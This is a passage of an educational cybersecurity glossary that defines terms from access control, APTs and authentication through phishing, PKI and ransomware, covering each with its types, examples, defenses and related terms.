Comprehensive Glossary

Access Control

Definition: A security mechanism that restricts access to resources based on the identity of users or systems.

Detailed Explanation: Access control is fundamental to information security, determining who can view, use, or modify resources. It operates on the principle of least privilege, granting users only the minimum access necessary to perform their duties.

Types:

• Discretionary Access Control (DAC): Resource owner controls access permissions
• Mandatory Access Control (MAC): System enforces access based on security labels
• Role-Based Access Control (RBAC): Access based on user roles
• Attribute-Based Access Control (ABAC): Access based on attributes of users, resources, and environment

Examples: File permissions in operating systems, database user privileges, network firewall rules

Related Terms: Authentication, Authorization, AAA (Authentication, Authorization, Accounting)

Advanced Persistent Threat (APT)

Definition: A prolonged and targeted cyber attack in which an unauthorized user gains access to a network and remains undetected for an extended period.

Detailed Explanation: APTs are sophisticated, multi-stage attacks typically carried out by well-funded groups, often nation-states. The goal is usually espionage, data theft, or strategic positioning rather than immediate financial gain.

Characteristics:

• Advanced: Uses sophisticated techniques and custom malware
• Persistent: Maintains long-term presence in target networks
• Threat: Poses significant risk to national security and critical infrastructure
• Multi-stage: Reconnaissance, initial compromise, establishing foothold, escalating privileges, lateral movement, data exfiltration

Examples: Stuxnet (targeting Iranian nuclear facilities), APT29/Cozy Bear (attributed to Russian intelligence)

Related Terms: Zero-day Exploit, Lateral Movement, Command and Control (C2), Exfiltration

Antivirus (AV) Software

Definition: A program designed to detect, prevent, and remove malicious software from computer systems.

Detailed Explanation: Antivirus software uses multiple detection methods including signature-based detection (comparing files against known malware signatures), heuristic analysis (identifying suspicious behavior patterns), and sandboxing (executing files in isolated environments).

Components:

• Scanner: Examines files and system memory
• Virus Definitions: Database of known malware signatures
• Quarantine: Isolated area for suspicious files
• Real-time Protection: Continuous monitoring of system activities

Examples: Windows Defender, Norton, Kaspersky, McAfee, Bitdefender

Related Terms: Malware, Endpoint Security, Signature-based Detection, Heuristic Analysis

Authentication

Definition: The process of verifying the identity of a user, device, or system before granting access to resources.

Detailed Explanation: Authentication ensures that users are who they claim to be. It's the first line of defense in access control and can be implemented using various factors.

Authentication Factors:

• Something You Know: Passwords, PINs, security questions
• Something You Have: Smart cards, tokens, mobile devices
• Something You Are: Biometrics (fingerprint, facial recognition, iris scan)
• Somewhere You Are: Location-based authentication (GPS, IP address)
• Something You Do: Behavioral biometrics (typing patterns, gait)

Multi-Factor Authentication (MFA): Uses two or more authentication factors for enhanced security

Related Terms: Authorization, Single Sign-On (SSO), Two-Factor Authentication (2FA), Biometrics

Authorization

Definition: The process of determining what resources and operations an authenticated user is permitted to access and perform.

Detailed Explanation: Authorization occurs after authentication and defines the scope of access granted to a user. It implements the principle of least privilege, ensuring users can only access resources necessary for their role.

Authorization Models:

• Access Control Lists (ACLs): Lists specifying which users can access specific resources
• Capability-based: Tokens granting specific access rights
• Policy-based: Rules engine evaluating access requests

Examples: File permissions (read, write, execute), database access privileges, API access tokens

Related Terms: Authentication, Access Control, Least Privilege, Permissions

Backdoor

Definition: A hidden method of bypassing normal authentication or security controls to gain unauthorized access to a system.

Detailed Explanation: Backdoors can be intentionally created by developers for maintenance purposes or maliciously installed by attackers after initial compromise. They provide persistent access to compromised systems.

Types:

• Application Backdoors: Hidden features in software
• System Backdoors: Modified system files or rootkits
• Cryptographic Backdoors: Weaknesses in encryption algorithms
• Hardware Backdoors: Hidden functionality in chips or devices

Detection Methods: Code review, network traffic analysis, file integrity monitoring, behavioral analysis

Related Terms: Trojan Horse, Rootkit, Remote Access Trojan (RAT), Persistence Mechanisms

Backup

Definition: The process of creating copies of data to enable recovery in case of data loss, corruption, or disaster.

Detailed Explanation: Backups are critical for business continuity and disaster recovery. The 3-2-1 rule is a best practice: keep 3 copies of data, on 2 different media, with 1 copy off-site.

Backup Types:

• Full Backup: Complete copy of all data (time-consuming, requires most storage)
• Incremental Backup: Only changes since last backup (faster, less storage)
• Differential Backup: Changes since last full backup
• Mirror Backup: Exact copy of source data

Backup Strategies: Scheduled backups, continuous data protection, cloud backups, tape backups

Related Terms: Disaster Recovery, Business Continuity, Data Redundancy, Archive

Botnet

Definition: A network of compromised computers (bots or zombies) controlled by a central command and control (C2) server to perform coordinated malicious activities.

Detailed Explanation: Botnets are powerful tools for cybercriminals, enabling large-scale attacks using the combined resources of thousands or millions of infected devices. Owners are often unaware their devices are part of a botnet.

Common Uses:

• DDoS Attacks: Overwhelming targets with traffic
• Spam Distribution: Sending mass unsolicited emails
• Credential Stuffing: Testing stolen credentials across websites
• Cryptocurrency Mining: Using victim resources for mining
• Click Fraud: Generating fake advertising clicks

Famous Examples: Mirai (IoT botnet), Emotet, Zeus, Conficker

Related Terms: Command and Control (C2), Zombie Computer, DDoS Attack, Malware

Brute Force Attack

Definition: A trial-and-error method of attempting to discover passwords, encryption keys, or other credentials by systematically trying all possible combinations.

Detailed Explanation: Brute force attacks rely on computational power rather than clever techniques. Success depends on password complexity, computing power available, and time constraints.

Variations:

• Simple Brute Force: Trying all possible combinations
• Dictionary Attack: Using wordlists of common passwords
• Hybrid Attack: Combining dictionary words with character substitutions
• Reverse Brute Force: Using common passwords against multiple accounts
• Credential Stuffing: Using known username/password pairs from breaches

Defense Mechanisms: Account lockout policies, CAPTCHA, rate limiting, strong password requirements, multi-factor authentication

Related Terms: Password Cracking, Rainbow Table, Dictionary Attack, Password Policy

CIA Triad

Definition: The three fundamental principles of information security: Confidentiality, Integrity, and Availability.

Detailed Explanation: The CIA Triad forms the foundation of information security policies and practices. Every security control should support one or more of these principles.

Components:

• Confidentiality: Preventing unauthorized disclosure of information (encryption, access controls)
• Integrity: Ensuring data accuracy and preventing unauthorized modifications (hashing, checksums, digital signatures)
• Availability: Ensuring authorized access to resources when needed (redundancy, backups, DDoS protection)

Extensions: Some models extend to CIAAN (adding Authentication and Non-repudiation) or Parkerian Hexad (adding Possession, Authenticity)

Related Terms: Information Security, Data Protection, Security Controls

Command and Control (C2)

Definition: Infrastructure used by attackers to maintain communication with compromised systems and issue commands to malware or botnets.

Detailed Explanation: C2 servers act as the central nervous system of cyber attacks, enabling attackers to control infected machines, exfiltrate data, and coordinate large-scale operations. Modern C2 systems use sophisticated techniques to evade detection.

C2 Communication Methods:

• HTTP/HTTPS: Blending with normal web traffic
• DNS Tunneling: Encoding commands in DNS queries
• Social Media: Using public platforms for covert communication
• P2P Networks: Decentralized peer-to-peer control
• Dead Drop Resolvers: Indirect communication through third parties

Detection Techniques: Network traffic analysis, anomaly detection, threat intelligence feeds, behavioral analysis

Related Terms: Botnet, Malware, Exfiltration, Remote Access Trojan (RAT)

Cryptography

Definition: The science of securing information by transforming it into an unreadable format (encryption) that can only be reversed by authorized parties with the correct key (decryption).

Detailed Explanation: Cryptography is essential for protecting data confidentiality, integrity, and authenticity in transit and at rest. It uses mathematical algorithms and keys to transform plaintext into ciphertext.

Types of Cryptography:

• Symmetric Encryption: Same key for encryption and decryption (AES, DES, 3DES) - Fast but requires secure key exchange
• Asymmetric Encryption: Different keys (public/private) for encryption and decryption (RSA, ECC) - Slower but enables secure key exchange
• Hash Functions: One-way transformation for integrity verification (SHA-256, MD5, BLAKE2)
• Digital Signatures: Combining hashing and asymmetric encryption for authentication and non-repudiation

Applications: HTTPS/TLS, VPN, secure email (S/MIME, PGP), file encryption, password hashing, blockchain

Related Terms: Encryption, Decryption, Public Key Infrastructure (PKI), Digital Certificate, SSL/TLS

Cross-Site Scripting (XSS)

Definition: A web security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users.

Detailed Explanation: XSS attacks exploit inadequate input validation and output encoding in web applications. The malicious script executes in the victim's browser with the same privileges as legitimate website scripts.

Types of XSS:

• Reflected XSS: Script included in request and immediately reflected in response (non-persistent)
• Stored XSS: Script permanently stored on target server (in database, comments, forums) - More dangerous
• DOM-based XSS: Vulnerability in client-side code (JavaScript) rather than server-side

Potential Impact: Session hijacking, credential theft, website defacement, malware distribution, phishing

Prevention: Input validation, output encoding, Content Security Policy (CSP), HTTPOnly cookies

Related Terms: Web Application Security, SQL Injection, CSRF, Input Validation

Cybercrime

Definition: Criminal activities carried out using computers, networks, or the internet, either as the target or as the tool for committing traditional crimes.

Detailed Explanation: Cybercrime encompasses a wide range of illegal activities in the digital realm. It can be categorized by target (individuals, organizations, governments) or by nature (financial, data, access, content crimes).

Major Categories:

• Financial Crimes: Online fraud, credit card theft, phishing, ransomware, cryptocurrency theft
• Data Crimes: Data breaches, identity theft, corporate espionage
• Content Crimes: Distribution of illegal content, copyright infringement
• Access Crimes: Unauthorized system access, hacking, password cracking
• Disruption Crimes: DDoS attacks, website defacement, sabotage

Global Impact: Estimated cost exceeds $6 trillion annually worldwide (2021 figures)

Related Terms: Hacking, Phishing, Malware, Identity Theft, Cyber Terrorism

Cyber Forensics

Definition: The application of investigation and analysis techniques to gather and preserve evidence from digital devices for use in legal proceedings.

Detailed Explanation: Cyber forensics (also called digital forensics or computer forensics) involves the scientific collection, preservation, analysis, and presentation of digital evidence. It follows strict procedures to ensure evidence admissibility in court.

Forensic Process:

• Identification: Recognizing potential sources of evidence
• Preservation: Securing evidence and preventing tampering
• Collection: Acquiring data using forensically sound methods
• Analysis: Examining evidence to reconstruct events
• Documentation: Recording all findings and procedures
• Presentation: Reporting results in understandable format

Types: Computer forensics, mobile forensics, network forensics, cloud forensics, memory forensics

Tools: EnCase, FTK (Forensic Toolkit), Autopsy, Volatility, Wireshark

Related Terms: Chain of Custody, Evidence Collection, Write Blocker, Forensic Image

Cyber Stalking

Definition: The use of electronic communications to repeatedly harass, threaten, or intimidate an individual, causing fear or emotional distress.

Detailed Explanation: Cyber stalking is a serious crime that leverages digital platforms to target victims. Unlike traditional stalking, it can occur 24/7 from any location, making it particularly invasive and difficult to escape.

Common Methods:

• Direct Harassment: Threatening emails, messages, or social media posts
• Monitoring: Tracking victim's online activities and location
• Impersonation: Creating fake profiles or accounts
• Doxing: Publishing private information publicly
• Cyberbullying: Coordinated harassment campaigns
• Spyware: Installing monitoring software on victim's devices

Legal Framework (India): IPC Section 354D (Stalking), IT Act Section 67 (Publishing obscene material)

Related Terms: Cyberbullying, Doxing, Harassment, Identity Theft

Cyber Terrorism

Definition: The use of cyberattacks by politically or ideologically motivated groups to intimidate, coerce, or cause fear in populations or governments.

Detailed Explanation: Cyber terrorism targets critical infrastructure, government systems, or civilian populations to advance political or ideological goals. It represents the convergence of terrorism and cyber warfare.

Potential Targets:

• Critical Infrastructure: Power grids, water systems, transportation
• Financial Systems: Banking, stock exchanges
• Healthcare: Hospitals, medical devices
• Government: Military, intelligence, emergency services
• Communications: Internet, telephone networks

Objectives: Disruption, destruction, propaganda, fundraising, recruitment, coordination

Related Terms: Critical Infrastructure, Cyber Warfare, APT, Hacktivism

Denial of Service (DoS) Attack

Definition: An attack that makes a computer resource unavailable to its intended users by overwhelming it with a flood of requests or exploiting vulnerabilities.

Detailed Explanation: DoS attacks aim to disrupt services rather than gain unauthorized access or steal data. They can cause significant financial losses and damage to reputation.

Types of DoS Attacks:

• Volume-based: Overwhelming bandwidth (UDP flood, ICMP flood)
• Protocol-based: Exploiting protocol weaknesses (SYN flood, Ping of Death)
• Application-layer: Targeting web applications (HTTP flood, Slowloris)
• DDoS (Distributed DoS): Coordinated attack from multiple sources (botnets)

Defense Mechanisms: Traffic filtering, rate limiting, DDoS mitigation services (Cloudflare, Akamai), load balancing, over-provisioning bandwidth

Related Terms: DDoS, Botnet, Amplification Attack, SYN Flood

Dictionary Attack

Definition: A password cracking technique that uses a pre-compiled list of words (dictionary) to guess passwords.

Detailed Explanation: Dictionary attacks are more efficient than brute force because they focus on likely passwords rather than trying all possible combinations. They exploit the tendency of users to choose simple, memorable passwords.

Attack Process:

• Compile list of common words, phrases, and previously leaked passwords
• Include variations (capitalization, number substitutions, common suffixes)
• Hash each word using the target hashing algorithm
• Compare hashed dictionary entries with target password hashes

Defense: Strong password policies, account lockout, password complexity requirements, avoiding dictionary words

Related Terms: Brute Force Attack, Password Cracking, Rainbow Table, Hybrid Attack

Digital Certificate

Definition: An electronic document that uses a digital signature to bind a public key with an identity (person, organization, server).

Detailed Explanation: Digital certificates are issued by Certificate Authorities (CAs) and are essential for establishing trust in online communications. They enable secure connections (HTTPS), email encryption, and code signing.

Certificate Components:

• Subject: Entity to whom certificate is issued
• Public Key: Public key of the certificate holder
• Issuer: Certificate Authority that issued the certificate
• Validity Period: Start and expiration dates
• Digital Signature: CA's signature validating certificate authenticity
• Extensions: Additional information (key usage, alternative names)

Types: SSL/TLS certificates, code signing certificates, email certificates, client certificates

Related Terms: Public Key Infrastructure (PKI), Certificate Authority (CA), SSL/TLS, Digital Signature

Digital Signature

Definition: A mathematical scheme for verifying the authenticity and integrity of digital messages or documents.

Detailed Explanation: Digital signatures provide authentication (verifying sender identity), non-repudiation (sender cannot deny signing), and integrity (detecting message tampering). They use asymmetric cryptography.

How It Works:

• Signing: Hash the document, encrypt hash with sender's private key
• Verification: Decrypt signature with sender's public key, compare with document hash
• If hashes match, signature is valid and document is unmodified

Applications: Software distribution, email security (S/MIME), PDF documents, financial transactions, legal contracts

Standards: RSA, DSA (Digital Signature Algorithm), ECDSA (Elliptic Curve DSA)

Related Terms: Public Key Cryptography, Hash Function, Digital Certificate, Non-repudiation

Disaster Recovery (DR)

Definition: A set of policies, tools, and procedures to enable the recovery or continuation of vital technology infrastructure and systems following a disaster.

Detailed Explanation: Disaster recovery focuses on restoring IT systems, data, and infrastructure after events like cyberattacks, hardware failures, natural disasters, or human errors.

Key Components:

• DR Plan: Documented procedures for recovery
• Backup Strategy: Regular, tested backups of critical data
• Recovery Time Objective (RTO): Maximum acceptable downtime
• Recovery Point Objective (RPO): Maximum acceptable data loss
• Hot Site: Fully equipped backup facility ready for immediate use
• Cold Site: Basic facility requiring equipment setup

Testing: Regular DR drills, tabletop exercises, failover testing

Related Terms: Business Continuity, Backup, High Availability, Failover

Doxing

Definition: The malicious practice of researching and publicly broadcasting private or identifying information about an individual without their consent.

Detailed Explanation: Doxing (from "dropping documents" or "docs") involves collecting personal information from various sources and publishing it online, often with malicious intent to harass, intimidate, or endanger the target.

Information Typically Exposed:

• Real name, address, phone number
• Email addresses, social media profiles
• Employment information, financial details
• Family member information
• Photos, videos, private communications

Purposes: Harassment, intimidation, revenge, silencing critics, enabling physical threats

Legal Status: May violate privacy laws, harassment statutes, or cyberstalking legislation

Related Terms: Cyber Stalking, Swatting, Online Harassment, Privacy Violation

Encryption

Definition: The process of converting plaintext (readable data) into ciphertext (unreadable format) using an algorithm and encryption key.

Detailed Explanation: Encryption is fundamental to data confidentiality, protecting information from unauthorized access during transmission or storage. Only those with the correct decryption key can reverse the process.

Encryption Types:

• Symmetric Encryption: Same key for encryption/decryption
  • Fast and efficient for large data
  • Examples: AES-256, ChaCha20, Twofish
  • Challenge: Secure key distribution
• Asymmetric Encryption: Different keys (public/private)
  • Solves key distribution problem
  • Slower, used for key exchange or small data
  • Examples: RSA, ECC, ElGamal

Applications: HTTPS, VPN, encrypted email, full disk encryption, file/folder encryption, database encryption

Related Terms: Decryption, Cryptography, Cipher, Key Management

Endpoint Security

Definition: The practice of securing end-user devices (laptops, desktops, mobile devices, servers) against cyber threats.

Detailed Explanation: Endpoints are common attack vectors as they're directly accessible to users and often outside the protected corporate network. Endpoint security provides multiple layers of protection.

Components:

• Antivirus/Anti-malware: Detecting and removing malicious software
• Endpoint Detection and Response (EDR): Advanced threat detection and investigation
• Device Control: Managing USB and external device usage
• Firewall: Controlling network traffic
• Encryption: Protecting data at rest
• Application Control: Whitelisting approved applications

Modern Approaches: Cloud-based management, AI/ML threat detection, zero trust architecture

Related Terms: Antivirus, EDR, Mobile Device Management (MDM), Data Loss Prevention (DLP)

Exploit

Definition: A piece of software, code, or sequence of commands that takes advantage of a vulnerability to cause unintended behavior in software or hardware.

Detailed Explanation: Exploits leverage security flaws to gain unauthorized access, escalate privileges, execute code, or cause denial of service. They're key tools in attackers' arsenals.

Exploit Types:

• Zero-day Exploit: Targets unknown vulnerabilities (no patch available)
• Remote Exploit: Works over a network without prior system access
• Local Exploit: Requires local access to the target system
• Client-side Exploit: Targets client applications (browsers, email clients)
• Server-side Exploit: Targets server software and services

Exploit Frameworks: Metasploit, Canvas, Core Impact (used by penetration testers and attackers)

Related Terms: Vulnerability, Patch, Zero-day, Proof of Concept (PoC)

Firewall

Definition: A network security device that monitors and controls incoming and outgoing network traffic based on predetermined security rules.

Detailed Explanation: Firewalls act as barriers between trusted internal networks and untrusted external networks (like the internet). They're the first line of defense in network security architecture.

Firewall Types:

• Packet Filtering: Examines packet headers (source/destination IP, port, protocol)
• Stateful Inspection: Tracks connection states and context
• Proxy Firewall: Intermediary between clients and servers
• Next-Generation Firewall (NGFW): Deep packet inspection, application awareness, IPS integration
• Web Application Firewall (WAF): Protects web applications from attacks

Deployment: Hardware appliances, software applications, cloud-based services

Rule Configuration: Default deny (whitelist) vs. default allow (blacklist) policies

Related Terms: Network Security, Access Control List (ACL), Intrusion Prevention System (IPS)

Forensic Analysis

Definition: The systematic examination of digital evidence to identify, preserve, analyze, and present facts related to cybercrime or security incidents.

Detailed Explanation: Forensic analysis follows scientific methodology to ensure evidence admissibility in court. Analysts must maintain chain of custody and use validated tools and techniques.

Analysis Techniques:

• File System Analysis: Examining file structures, metadata, deleted files
• Memory Analysis: Analyzing RAM for running processes, network connections
• Network Analysis: Examining captured network traffic
• Log Analysis: Reviewing system, application, and security logs
• Timeline Analysis: Reconstructing event sequences
• Malware Analysis: Reverse engineering suspicious software

Forensic Tools: EnCase, FTK, Autopsy, Volatility, Wireshark, IDA Pro

Related Terms: Cyber Forensics, Chain of Custody, Evidence Collection, Write Blocker

Grey Hat Hacker

Definition: A computer security expert who falls between white hat (ethical) and black hat (malicious) hackers, often violating laws or ethical standards but without malicious intent.

Detailed Explanation: Grey hat hackers may discover and exploit vulnerabilities without authorization but typically inform the affected party. While intentions may be good, their methods are questionable and potentially illegal.

Characteristics:

• Hack without malicious intent
• May violate laws or ethics in research
• Often disclose vulnerabilities publicly
• May seek recognition or financial reward
• Operate in ethical grey area

Controversy: Unauthorized testing is illegal regardless of intent; responsible disclosure requires permission

Related Terms: White Hat Hacker, Black Hat Hacker, Ethical Hacking, Responsible Disclosure

Hacker

Definition: An individual with advanced computer skills who explores computer systems, networks, and software, potentially to identify vulnerabilities or gain unauthorized access.

Detailed Explanation: The term "hacker" originally referred to skilled programmers but now commonly describes those who break into systems. Hackers are categorized by motivation and ethics.

Hacker Categories:

• White Hat (Ethical Hackers): Authorized security professionals testing systems with permission
• Black Hat (Malicious Hackers): Criminals who break into systems for personal gain or to cause harm
• Grey Hat: Operate between ethical and malicious, may hack without permission but without malicious intent
• Script Kiddies: Inexperienced individuals using others' tools
• Hacktivists: Hack for political or social causes
• State-Sponsored: Government-backed hackers conducting cyber espionage

Related Terms: Ethical Hacking, Penetration Testing, Black Hat, White Hat

Hash Function

Definition: A mathematical function that converts input data of any size into a fixed-size string of characters (hash value or digest), designed to be a one-way function.

Detailed Explanation: Hash functions are fundamental to data integrity verification, password storage, digital signatures, and blockchain technology. Good hash functions have specific properties.

Properties of Cryptographic Hash Functions:

• Deterministic: Same input always produces same output
• Fast Computation: Quick to calculate hash value
• One-way: Computationally infeasible to reverse
• Collision Resistant: Hard to find two inputs with same hash
• Avalanche Effect: Small input change drastically changes output

Common Hash Functions:

• MD5: 128-bit, now considered weak (collisions found)
• SHA-1: 160-bit, deprecated for cryptographic use
• SHA-256: 256-bit, widely used and secure
• SHA-3: Latest standard, different algorithm design
• BLAKE2: Fast and secure alternative

Applications: Password storage (with salting), file integrity verification, digital signatures, blockchain, HMAC

Related Terms: Digital Signature, Salting, Rainbow Table, Checksum

HTTPS (Hypertext Transfer Protocol Secure)

Definition: An extension of HTTP that uses encryption (TLS/SSL) to secure communication between web browsers and servers.

Detailed Explanation: HTTPS encrypts all communication, protecting against eavesdropping and man-in-the-middle attacks. It's now the standard for all websites, especially those handling sensitive data.

How It Works:

• TLS Handshake: Client and server negotiate encryption
• Certificate Verification: Server proves identity with digital certificate
• Key Exchange: Establish shared encryption keys
• Encrypted Communication: All data encrypted using agreed-upon cipher

Benefits: Data confidentiality, integrity, authentication, SEO ranking boost, user trust

Indicators: Padlock icon in browser, "https://" in URL, green address bar (EV certificates)

Related Terms: SSL/TLS, Digital Certificate, Encryption, Man-in-the-Middle Attack

Identity Theft

Definition: The fraudulent acquisition and use of a person's private identifying information, usually for financial gain.

Detailed Explanation: Identity theft involves stealing personal information (name, SSN, credit card details, credentials) to impersonate victims for unauthorized purposes. It can cause significant financial and reputational damage.

Common Methods:

• Phishing: Tricking victims into providing information
• Data Breaches: Stealing information from compromised databases
• Social Engineering: Manipulating people into divulging information
• Dumpster Diving: Searching trash for discarded documents
• Skimming: Capturing credit card data at ATMs or payment terminals
• Malware: Keyloggers and infostealers capturing credentials

Types: Financial identity theft, medical identity theft, criminal identity theft, synthetic identity theft

Prevention: Strong passwords, credit monitoring, shredding documents, careful social media sharing, two-factor authentication

Related Terms: Phishing, Data Breach, Credit Card Fraud, Social Engineering

Intrusion Detection System (IDS)

Definition: A security tool that monitors network traffic or system activities for malicious activities or policy violations and generates alerts.

Detailed Explanation: IDS acts as a surveillance system, detecting potential security incidents but not actively blocking them (unlike IPS). It's crucial for identifying threats that bypass perimeter defenses.

IDS Types:

• Network-based IDS (NIDS): Monitors network traffic
  • Placed at strategic network points
  • Analyzes packet contents and headers
  • Examples: Snort, Suricata, Zeek (Bro)
• Host-based IDS (HIDS): Monitors single host/device
  • Examines system logs, file integrity
  • Detects local attacks
  • Examples: OSSEC, Tripwire

Detection Methods:

• Signature-based: Matches known attack patterns
• Anomaly-based: Detects deviations from normal behavior
• Hybrid: Combines both approaches

Related Terms: Intrusion Prevention System (IPS), SIEM, Network Security Monitoring

Intrusion Prevention System (IPS)

Definition: An active security tool that monitors network traffic for malicious activity and can automatically take action to block or prevent threats.

Detailed Explanation: Unlike IDS which only detects and alerts, IPS can actively block attacks in real-time. It sits inline in the network path, examining traffic and taking preventive action.

Capabilities:

• Block malicious traffic: Drop packets from attacks
• Reset connections: Terminate suspicious sessions
• Rate limiting: Throttle suspicious traffic
• Modify packets: Remove malicious content
• Alert security team: Generate notifications

Deployment: Inline (directly in traffic path) vs. passive (mirror port)

Challenges: False positives can block legitimate traffic, performance impact, evasion techniques

Related Terms: Intrusion Detection System (IDS), Firewall, Next-Generation Firewall (NGFW)

JavaScript Malware

Definition: Malicious code written in JavaScript that executes in web browsers or other JavaScript-enabled environments to compromise systems.

Detailed Explanation: JavaScript malware exploits the ubiquity of JavaScript in web applications. It can execute without user awareness, steal data, redirect users, or download additional payloads.

Common Types:

• Drive-by Downloads: Automatically downloading malware when visiting compromised websites
• Browser-based Cryptominers: Mining cryptocurrency using visitor CPU resources
• Formjacking: Stealing credit card data from e-commerce checkout forms
• Malvertising: Malicious advertisements executing harmful scripts

Prevention: Keep browsers updated, use script blockers (NoScript), disable JavaScript for untrusted sites, web application firewalls

Related Terms: XSS, Drive-by Download, Malvertising, Web Application Security

Keylogger

Definition: A type of surveillance software or hardware that records every keystroke made on a computer or mobile device, capturing sensitive information like passwords and credit card numbers.

Detailed Explanation: Keyloggers operate covertly, capturing keystrokes without user knowledge. They can be software-based (malware) or hardware-based (physical devices attached to keyboards or USB ports).

Types:

• Software Keyloggers:
  • Kernel-based: Operates at OS kernel level
  • API-based: Hooks into system APIs
  • JavaScript-based: Captures web form inputs
• Hardware Keyloggers:
  • USB keyloggers: Devices between keyboard and computer
  • Wireless sniffers: Capture wireless keyboard transmissions
  • Acoustic keyloggers: Analyze keyboard typing sounds

Legitimate Uses: Employee monitoring, parental control, law enforcement investigations

Detection: Anti-malware software, process monitoring, physical inspection, network traffic analysis

Related Terms: Spyware, Monitoring Software, Screen Capture, Password Theft

Lateral Movement

Definition: Techniques used by attackers to progressively move through a network, searching for key assets and data after gaining initial access.

Detailed Explanation: After compromising an initial system, attackers use lateral movement to expand their access, escalate privileges, and reach high-value targets. This is a key phase in APT attacks.

Common Techniques:

• Pass-the-Hash: Using captured password hashes for authentication
• Pass-the-Ticket: Exploiting Kerberos tickets
• Remote Services: RDP, SSH, WMI, PowerShell remoting
• Credential Dumping: Extracting credentials from memory or files
• Exploiting Trust Relationships: Leveraging existing network trust

Detection: Network segmentation, monitoring lateral traffic, behavioral analysis, privileged access management

Related Terms: APT, Privilege Escalation, Network Segmentation, Zero Trust

Malware

Definition: Malicious software designed to damage, disrupt, or gain unauthorized access to computer systems.

Detailed Explanation: Malware is an umbrella term encompassing various types of malicious programs. It can steal data, encrypt files for ransom, spy on users, or use system resources without authorization.

Major Types:

• Virus: Self-replicating code that attaches to files
• Worm: Self-propagating malware spreading across networks
• Trojan: Disguised as legitimate software
• Ransomware: Encrypts files and demands payment
• Spyware: Secretly monitors and collects information
• Adware: Displays unwanted advertisements
• Rootkit: Provides privileged access while hiding presence
• Keylogger: Records keystrokes
• RAT (Remote Access Trojan): Enables remote control

Infection Vectors: Email attachments, malicious downloads, infected USB drives, exploit kits, compromised websites

Related Terms: Virus, Trojan, Ransomware, Antivirus, Endpoint Security

Man-in-the-Middle (MitM) Attack

Definition: An attack where an attacker intercepts and potentially alters communication between two parties who believe they are directly communicating with each other.

Detailed Explanation: MitM attacks position the attacker as a relay between victim and destination, allowing interception, eavesdropping, or modification of communications. Victims are unaware of the attacker's presence.

Attack Variants:

• ARP Spoofing: Manipulating ARP cache to intercept LAN traffic
• DNS Spoofing: Redirecting DNS queries to malicious servers
• Session Hijacking: Taking over active sessions
• SSL Stripping: Downgrading HTTPS to HTTP
• Email Hijacking: Intercepting email communications
• Wi-Fi Eavesdropping: Monitoring unencrypted wireless traffic

Prevention: Strong encryption (HTTPS, VPN), certificate pinning, secure network protocols, avoiding public Wi-Fi for sensitive transactions

Related Terms: Session Hijacking, SSL/TLS, ARP Spoofing, Encryption

Multi-Factor Authentication (MFA)

Definition: A security mechanism requiring users to provide two or more verification factors to gain access to a resource.

Detailed Explanation: MFA significantly enhances security by requiring multiple independent credentials. Even if one factor is compromised, unauthorized access is prevented by remaining factors.

Authentication Factors:

• Knowledge Factors: Something you know (password, PIN)
• Possession Factors: Something you have (token, smart card, mobile device)
• Inherence Factors: Something you are (biometrics)
• Location Factors: Somewhere you are (GPS, IP address)
• Behavioral Factors: Something you do (typing patterns)

Common MFA Methods: SMS codes, authenticator apps (Google Authenticator, Authy), hardware tokens (YubiKey), biometric authentication

Benefits: Reduced risk of credential theft, compliance requirements, protection against phishing

Related Terms: Two-Factor Authentication (2FA), Authentication, Biometrics, One-Time Password (OTP)

Network Segmentation

Definition: The practice of dividing a computer network into smaller subnetworks to improve security, performance, and management.

Detailed Explanation: Network segmentation limits the blast radius of security breaches by isolating critical assets and restricting lateral movement. It implements defense-in-depth principles.

Segmentation Methods:

• Physical Segmentation: Separate physical devices and cables
• Logical Segmentation: VLANs, subnets, software-defined networking
• Microsegmentation: Fine-grained isolation at workload level

Benefits: Contained breaches, improved performance, easier compliance, better network visibility

Related Terms: VLAN, Firewall, Zero Trust, Microsegmentation, Defense in Depth

One-Time Password (OTP)

Definition: A password that is valid for only one login session or transaction, providing enhanced security over static passwords.

Detailed Explanation: OTPs are generated dynamically and expire quickly, making them resistant to replay attacks and credential theft. They're commonly used in multi-factor authentication.

OTP Types:

• Time-based OTP (TOTP): Changes every 30-60 seconds (Google Authenticator)
• Counter-based OTP (HOTP): Changes with each use
• SMS OTP: Sent via text message
• Email OTP: Sent via email

Generation Methods: Hardware tokens, mobile apps, SMS, email

Related Terms: Multi-Factor Authentication, Two-Factor Authentication, TOTP, Authenticator App

Phishing

Definition: A social engineering attack using fraudulent communications (typically email) to trick recipients into divulging sensitive information or installing malware.

Detailed Explanation: Phishing exploits human psychology rather than technical vulnerabilities. Attackers impersonate trusted entities to create urgency, fear, or curiosity, prompting victims to act without careful consideration.

Phishing Types:

• Email Phishing: Mass emails to broad audience
• Spear Phishing: Targeted attacks using personalized information
• Whaling: Targeting high-level executives
• Clone Phishing: Replicating legitimate emails with malicious modifications
• Vishing: Voice phishing using phone calls
• Smishing: SMS-based phishing
• Business Email Compromise (BEC): Impersonating business executives

Red Flags: Urgent language, suspicious sender addresses, generic greetings, unexpected attachments, requests for sensitive information

Prevention: Security awareness training, email filtering, domain authentication (SPF, DKIM, DMARC), multi-factor authentication

Related Terms: Social Engineering, Spear Phishing, Vishing, Smishing, Email Security

Public Key Infrastructure (PKI)

Definition: A framework of policies, procedures, hardware, software, and people to create, manage, distribute, use, store, and revoke digital certificates.

Detailed Explanation: PKI enables secure electronic transfer of information by binding public keys to entities. It's the foundation of trust in online communications, e-commerce, and secure access.

PKI Components:

• Certificate Authority (CA): Issues and manages digital certificates
• Registration Authority (RA): Verifies certificate requests
• Digital Certificates: Bind public keys to identities
• Certificate Repository: Stores and distributes certificates
• Certificate Revocation List (CRL): Lists revoked certificates

Applications: HTTPS/SSL/TLS, email encryption (S/MIME), code signing, VPN, document signing

Related Terms: Digital Certificate, Certificate Authority, SSL/TLS, Asymmetric Encryption

Quarantine

Definition: The isolation of suspected malicious files or infected systems to prevent spread of malware while allowing for further analysis.

Detailed Explanation: Quarantine is a containment strategy used by antivirus software and security systems to safely handle potentially harmful files without deleting them immediately, allowing for investigation and potential recovery of false positives.

Quarantine Process:

• Detection of suspicious file or activity
• Isolation from system and network
• Analysis of threat level
• Decision: Delete, restore, or continue monitoring

Applications: Antivirus quarantine, email filtering, network isolation

Related Terms: Antivirus, Malware, Sandbox, Network Isolation

Ransomware

Definition: Malicious software that encrypts victim's files or locks their system, demanding payment (ransom) for restoration of access.

Detailed Explanation: Ransomware is one of the most damaging forms of malware, causing billions in losses annually. It combines encryption technology with extortion, often threatening to publish stolen data if ransom isn't paid.

Ransomware Types:

